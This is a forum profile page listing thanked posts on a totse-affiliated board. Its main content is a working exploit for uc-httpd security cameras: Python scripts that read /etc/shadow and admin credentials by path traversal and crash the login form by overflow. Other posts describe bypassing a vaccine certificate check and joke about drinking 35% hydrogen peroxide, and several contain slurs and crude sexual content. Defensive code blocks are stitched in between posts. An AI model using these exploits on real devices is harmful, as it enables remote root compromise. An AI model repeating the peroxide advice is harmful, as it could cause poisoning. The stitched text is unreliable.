Posts That Were Thanked by Sophie
-
2021-11-05 at 1:42 PM UTC in Last day on paper
Basically the whole time I've been posting on totse and affiliated message boards I've been under court/government imposed restrictions on my freedom, making things like drinking alcohol, leaving my house, not notifying officials of exact times of medical appointments and leaving my city subject to periods of incarceration which I have endured over the past 15 years. It's been entirely my doing and I can't blame anyone but myself but I'm also acutely aware of the cold steel wheels of bureaucracy that prefer you to lie in the track so they can trample you, leaving a mangled corpse in its wake. I like to think I sidestepped it a little and only suffered some minor injuries but honestly the scars will take a while to heal.
This is my last day under such conditions and I would like to thank all of you for helping me cope all these years. A special thank you to Lanny for starting and maintaining this place. We all post here for our own reasons and collectively you have all helped me more than you know and I hope I've helped someone a little bit too.
I hope this place is one day given the recognition it deserves
-
2021-11-04 at 12:03 AM UTC in How come the pedos on this site are never the ones to die?
-
2021-11-03 at 12:48 PM UTC in Don'tTellEm is quite jealous of Technologist...
it would be retarded for anyone to be jealous of anyone else based on what they post on the internet, especially on this site
-
2021-11-03 at 3:41 AM UTC in Several posters are regularly using desomorphine...
-
2021-11-01 at 5:08 AM UTC in You would be happier with kids
The author of this post has returned to nothingness
-
2021-10-29 at 11:19 AM UTC in Vaccine certificate security
Originally posted by Biff Understudy This is the file that has all the interesting javascript(obfuscated) https://www2.medicareaustralia.gov.au/moaonline/main-es2015.68519c0caf05b65442a4.js
That's just a minimised Angular file, it contains all the basic logic to run the web application. I doubt it has anything interesting in it.
Originally posted by Technologist If a person is going to be a pussy and not get the vaccine, then they should wear it like a badge of honor.
You aren’t man enough to get a shot, man up and be honest about it pussies!
"Just accept being a second class citizen white man. Accept being a legal outcast like a man! Be proud that society can legally shit on you. Real men like being cucks. Be happy to be treated like shit. Be proud of us being treated better than you."
-
2021-10-28 at 11:24 PM UTC in Well, well, well. What do we have here.
The author of this post has returned to nothingness
-
2021-10-28 at 9:41 AM UTC in Vaccine certificate security
Originally posted by Biff Understudy Vaccine certificates(different from vaccine passports) are coming out next month in my country and I thought a thread would be good to discuss the various security measures implemented. I assume the international vaccine passports will be very secure, so I am more interested in local certificates.
For instance, earlier versions of the Australian vaccine certificate were extremely insecure. They worked like so..
- AJAX request to their server with a JSON response "vaccineStatus" : "Y" or "N"
- This JSON value was stored to a local variable (I set a breakpoint in javascript and simply changed this)
- Download immunisation history of user via AJAX request(PDF file - you could change this to a different file via javascript)
- IF vaccineStatus == "Y", THEN generate vaccine certificate by reading details from immunisation history PDF file
Others reported it was just as easy with a man-in-the-middle attack.
How secure will the QR code certificates be? What data do they share? What are some possible security issues with them?
The EU ones are signed with a private key. That makes them fairly secure when used with any EU vaccine passport validator app. There is some talk about some private keys either having been leaked or brute-forced, and there is a valid cert going around for Adolf Hitler, but it's perfectly possible some pharmacist or doctor created that just for the lulz.
Example code is at:
https://github.com/nofaceinbook/hc1_test_cert
https://github.com/cn-uofbasel/ch-dcc-keys
https://github.com/minvws/nl-covid19-coronacheck-provider-docs/tree/main/signing-demo
Info on the possible leak:
https://github.com/ehn-dcc-development/hcert-spec/issues/103
https://rfmirror.com/Thread-TRADING-make-EU-green-pass?page=1
-
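The two posts above contrast a client-held `vaccineStatus` flag with certificates signed by the issuer's private key. The following is an added example, not code from the thread or from any of the linked projects, showing why editing a field in the browser does not survive signature verification. The token layout (base64 JSON, a dot, base64 ECDSA signature) and the names `issueCertificate`, `verifyCertificate` and `editField` are assumptions made for illustration and are not the EU certificate wire format.

```javascript
// Added example: the key pair and payloads are constructed for illustration.
const crypto = require('node:crypto');

// Issuer (server side): the only party holding the private signing key.
const issuer = crypto.generateKeyPairSync('ec', { namedCurve: 'prime256v1' });

function issueCertificate(payload, privateKey) {
  const body = Buffer.from(JSON.stringify(payload), 'utf8');
  const sig = crypto.sign('sha256', body, privateKey);
  return body.toString('base64') + '.' + sig.toString('base64');
}

// Verifier: accepts a certificate only if the issuer's public key validates
// the exact bytes of the payload. No client-held flag is consulted.
function verifyCertificate(token, publicKey) {
  const parts = String(token).split('.');
  if (parts.length !== 2) return { valid: false, reason: 'malformed' };
  const body = Buffer.from(parts[0], 'base64');
  const sig = Buffer.from(parts[1], 'base64');
  let ok = false;
  try {
    ok = crypto.verify('sha256', body, publicKey, sig);
  } catch (e) {
    ok = false; // an undecodable signature is treated as invalid
  }
  if (!ok) return { valid: false, reason: 'bad signature' };
  return { valid: true, payload: JSON.parse(body.toString('utf8')) };
}

// Models the breakpoint edit from the quoted post: a field in the payload is
// changed on the client while the original signature is kept.
function editField(token, changes) {
  const [b64, sig] = token.split('.');
  const payload = JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  const edited = JSON.stringify(Object.assign(payload, changes));
  return Buffer.from(edited, 'utf8').toString('base64') + '.' + sig;
}

const genuine = issueCertificate({ name: 'Sample Person', vaccineStatus: 'N' }, issuer.privateKey);
const edited = editField(genuine, { vaccineStatus: 'Y' });
console.log(verifyCertificate(genuine, issuer.publicKey));
console.log(verifyCertificate(edited, issuer.publicKey));
```

The scheme is only as strong as the custody of the signing key, which is the concern raised in the leak discussion linked above.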
2021-10-23 at 1:21 AM UTC in I banged a hooker with an Ernst Junger quote tattooed on her back
Skipping right over a lot, groceries has been my sorta dinner companion, sorta girlfriend every time I go to Kyiv. Although I basically keep her (she earns about $350 a month at her job) she's pretty hard to get along with, and we have lots of fights. On one of our recent fights I decided to get a hooker, as you do in Kyiv.
I had one I had seen since the last time I was in Ukraine, and asked her to my hotel room. She advertised her language as "English", not as Ukrainian and Russian, and only took Euros, both of which were off. She was really nice on Whatsapp, but wouldn't meet me the first time I messaged her, since it was about 2am, and she only worked until 12am.
While in Kyiv I spent a few nights in the Ibis at the Railway Station. Beautiful hotel, I loved how the room seemed to have everything thought out for guests. I then moved into an AirBNB in an old Soviet flat for a week. Even Groceries Girl said the flat was dingy and old, but it had everything you might need, like a nice enough bed, a bathroom, kitchen, and a great view of the city. I slept in the bed the first night, but got new sheets and pillows before groceries girl stayed over, I am classy like that.
Groceries stayed over that weekend. We had a good time. Had some sex in the bed, Groceries did her usual weird thing laying down plastic everywhere and feeding me cheese and crackers. It's endearing. She only ever usually stays over on weekends, the rest of the time she works at her bullshit $2 an hour fake job.
Then Groceries and me had a fight. Basically it was after the I wanted to have sex or something, and she was, as usual cold and unresponsive. She is terrible at sex, never gets wet enough for penetration, always needs lube, never orgasms no matter what I do, even when I lick her out for hours. It's not me either before you start Techno - any other girl would cum buckets, but not her. She just has that whole cold Russian-descent thing going on. It kind of bothers me.
Anyway, the AirBNB was $20 a night, so I had to spend my last night at Ibis, about $70 a night, which didn't bother me. Ibis is just so clean and modern and western that it feels like being at home. So moved to Ibis, but Groceries didn't want to have sex the night before, so whatsapped the hooker again while waiting to check in.
Let me explain. Hotels let you check in at around 2pm. But they want you to check out at around 11am. I had checked out from the AirBNB at 10am, so I had moved my shit into my rental car, so was homeless for a few hours. I actually messaged the hooker from KFC, right across from Ibis, and arranged to meet her at 3pm, about an hour after I was due to check in.
There was a homeless outreach right beside KFC that day. Lots of homeless babushkas and dedushkas waiting for free food. On the road beside them there are $100k+ Mercs and Audis. It's sobering to encounter actually poor people. In the west we have drug addicts and bullshit like that, but not actual people who live sober, meal to meal. Groceries girl gives them money. I prefer to pretend they don't exist at all.
-
2021-10-22 at 5:05 PM UTC in Lanny stop giving out my IP or stop
you're imagining things again
-
2021-10-21 at 9:57 AM UTC in Sh/Bash based malware for *Nix.
Originally posted by troon you got me. i can taste my own tears. i'm really not trolling you, just responding to your crap-posting and schizo outbursts. then i learned you're actually a sick individual. i had thought it was satire, or at least just for your imagination. but no.
You're literally messaging two entirely different people you incompetent fuckwit lol
-
2021-10-14 at 12:41 AM UTC in Someone i know purchased a concentration of 35 % hydrogen peroxide and gargled it as mouthwash...
35% Food Grade Hydrogen Peroxide is a very powerful chemical. Be safe and wear eye protection and gloves when drinking it.
-
2021-10-11 at 7:25 PM UTC in n-day IoT LFD+RCE Buffer overflow exploit - 2million+ vulnerable devices - for research only :) do not abuse.
So, here is an n-day exploit that we (my 0day development crew) found back in 2017 (zero-day at the time). Reposting from my github. It's still unpatched despite being four years old, with over two million vulnerable IoT devices (with remote root possible on all of them).
The affected software is "uc-httpd" which is a web interface for a series of models of security cams. Due to the nature of this vuln, it's not possible for them to patch it without performing a mass product recall and re-writing the firmware, so currently it's still exploitable as an n-day :)
Do not abuse this. This is only for research, nothing else. I can't be held liable for your stupidity.
There are multiple exploits here. There is a local file disclosure and also a buffer overflow - you can generally get root via the LFD alone, so there's not really much need for the buffer overflow unless an LFD scenario fails.
So, the LFD is sent as a direct HTTP request to the box, rather than being a vuln POST/GET param. You can generally read /etc/shadow file on the box via the LFD, which contains PLAINTEXT hashes for the root password (so you can just SSH into the box as root from there using the plaintext pass).
If for some reason you can't read the shadow file via the LFD, then instead you should attempt to read /mnt/mtd/Config/Account1 to get credentials from the admin interface, and then you can abuse the overflow from there to get root.
Here you can see the results from shodan, showing that there are currently more than 1.9 million devices running this (with our more extensive scanning returning over 2.5million devices):
LFD automated exploit code (python):
#!/usr/bin/env python
import urllib2, httplib, sys
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'
print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
host = sys.argv[1]
fd = raw_input('[+] File or Directory: ')
print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()
It is also worth noting, that in addition to the LFD vuln... you can also supply a directory path to uc-httpd in the same manner that you'd supply the file you want to disclose... it will then output the contents of the directory to you as if you ran "ls" on that dir, so you can use that to enumerate directory contents in order to read even more files (although generally all you need to read to pop root is /etc/shadow or /mnt/mtd/Config/Account1)
If you can't read shadow file and ssh direct into the box as root that way, then read Account1 file and use the following buffer overflow within the web interface (protip: if ASLR is enabled, you can get the relevant memory regions via reading particular proc entries through the LFD)
Buffer Overflow automated exploit code (python):
import mechanize, time, sys, urllib, socket
from termcolor import colored
print colored('uc-httpd web-daemon bufferoverflow', 'red')
print colored('- Overwrites the stack (attach to see)', 'red')
print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')
time.sleep(2)
def at_login_overflow():
print colored('Sending payload.. ', 'red')
s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id
x = mechanize.Browser()
x.set_handle_robots(False)
x.set_debug_responses(True)
x.addheaders = [("User-agent",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
login = x.open(tar_full + s_c)
x.select_form(nr=0)
x["username"] = buffersm
x["password"] = "mikevirushackinglimited"
try:
x.submit()
except Exception:
print colored('Target daemon not vulnerable.', 'red')
pass
check_conn()
# Check interface status
def check_conn():
time.sleep(1)
print colored('Checking interface status..', 'red')
try:
urllib.urlopen(tar_full)
print colored('Exploit failed', 'red')
except Exception:
print colored('Finished.', 'red')
pass
tar = sys.argv[1]
tar_p = sys.argv[2]
buff_size = sys.argv[3]
tar_full = "http://" + tar + ":" + tar_p
# rec 180
buffersm = "\x41" * int(buff_size)
# post only
at_login_overflow()
Overwrite set shellcode:
enjoy ;) but please don't abuse.
-
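For anyone defending devices like these, the file-disclosure requests described in the post above are visible in whatever records the raw HTTP request target (a reverse proxy, IDS or packet capture in front of the device). The following is an added detection example, not code from the post. The log line format, the sample lines and the names `analysePath` and `scan` are constructed assumptions; the watched paths are the ones the post names.

```javascript
// Added example: constructed log lines; the "src request status" layout is assumed.
const SAMPLE_LOG = [
  '198.51.100.7 "GET /Login.htm HTTP/1.0" 200',
  '198.51.100.7 "GET /../../../../../etc/shadow HTTP/1.0" 200',
  '203.0.113.9 "GET /%2e%2e/%2e%2e/mnt/mtd/Config/Account1 HTTP/1.0" 200',
  '203.0.113.9 "GET /css/../Login.htm HTTP/1.0" 200',
  '192.0.2.44 "GET /..%2f..%2fproc/self/maps HTTP/1.0" 404',
];

// Paths the post names as targets of the disclosure bug.
const SENSITIVE = ['/etc/shadow', '/mnt/mtd/Config/', '/proc/'];

// Percent-decode a bounded number of times so encoded dot segments are seen.
function decodePath(raw) {
  let cur = raw;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur.replace(/\\/g, '/');
}

// Resolve dot segments; a ".." with nothing left to pop means the request
// climbed above the web root.
function analysePath(rawTarget) {
  const kept = [];
  let escaped = false;
  for (const seg of decodePath(rawTarget.split('?')[0]).split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { if (kept.length === 0) escaped = true; else kept.pop(); }
    else kept.push(seg);
  }
  const resolved = '/' + kept.join('/');
  const sensitive = SENSITIVE.find((p) => resolved.startsWith(p)) || null;
  return { escaped, resolved, sensitive };
}

// Return one finding per request that escapes the web root.
function scan(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/^(\S+) "(\S+) (\S+) [^"]*" (\d{3})$/);
    if (!m) continue;
    const r = analysePath(m[3]);
    if (r.escaped) hits.push({ src: m[1], status: Number(m[4]), ...r });
  }
  return hits;
}
```

Run the check on the request target exactly as received, since many clients and proxies normalise dot segments before logging. A hit with status 200 on one of the watched paths is the case to triage first.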
2021-10-08 at 4:02 AM UTC in Secret American Court to punish soldier for free speech
scron if you're reading this I will transfer you $10 in btc if you twist HTS nipples HARD as punishment for those posts
-
2021-10-04 at 8:19 PM UTC in Has anyone ever seen you type “niggasinspace”
-
2021-10-03 at 12:28 PM UTC in 486 Will it start today?
i was gonna shit on you but then i remembered ur friend died so consider this my condolences n ill come back to shit on u in a week thank you good day
-
2021-09-28 at 7:07 PM UTC in Amputation: dominate arm above elbow
-
2021-09-25 at 6:56 PM UTC in Chinese property market prolapsing - diagram included
-
2021-09-21 at 3:56 PM UTC in In a few more years New Zealand will cease to exist.
-
2021-09-20 at 12:08 AM UTC in Toronto Canada Night Life
"when covid ends" lol